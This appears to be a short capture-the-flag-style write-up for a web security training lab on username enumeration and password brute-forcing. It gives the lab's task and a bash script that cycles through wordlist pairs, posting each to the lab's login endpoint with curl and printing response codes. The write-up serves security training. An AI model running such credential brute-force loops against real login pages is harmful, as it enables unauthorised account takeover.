🟢Username enumeration via different responses

This lab is vulnerable to username enumeration and password brute-force attacks. It has an account with a predictable username and password, which can be found in the following wordlists:

Candidate usernames
Candidate passwords

To solve the lab, enumerate a valid username, brute-force this user's password, then access their account page.

Alternative

#!/bin/bash
for u in `cat username.txt`
do
    for p in `cat pwd.txt`
    do
    printf "$u:$p\n"
    curl -F 'username'=$u -F 'password'=$p -s -o /dev/null -w "%{http_code}\n" https://0a8400790418dd1e827f97b900c600df.web-security-academy.net/login
    done
done

This script runs and shows the response code returned.

PreviousAuthentication Labs Next2FA simple bypass

Last updated 2 years ago

hashtagAlternative

Alternative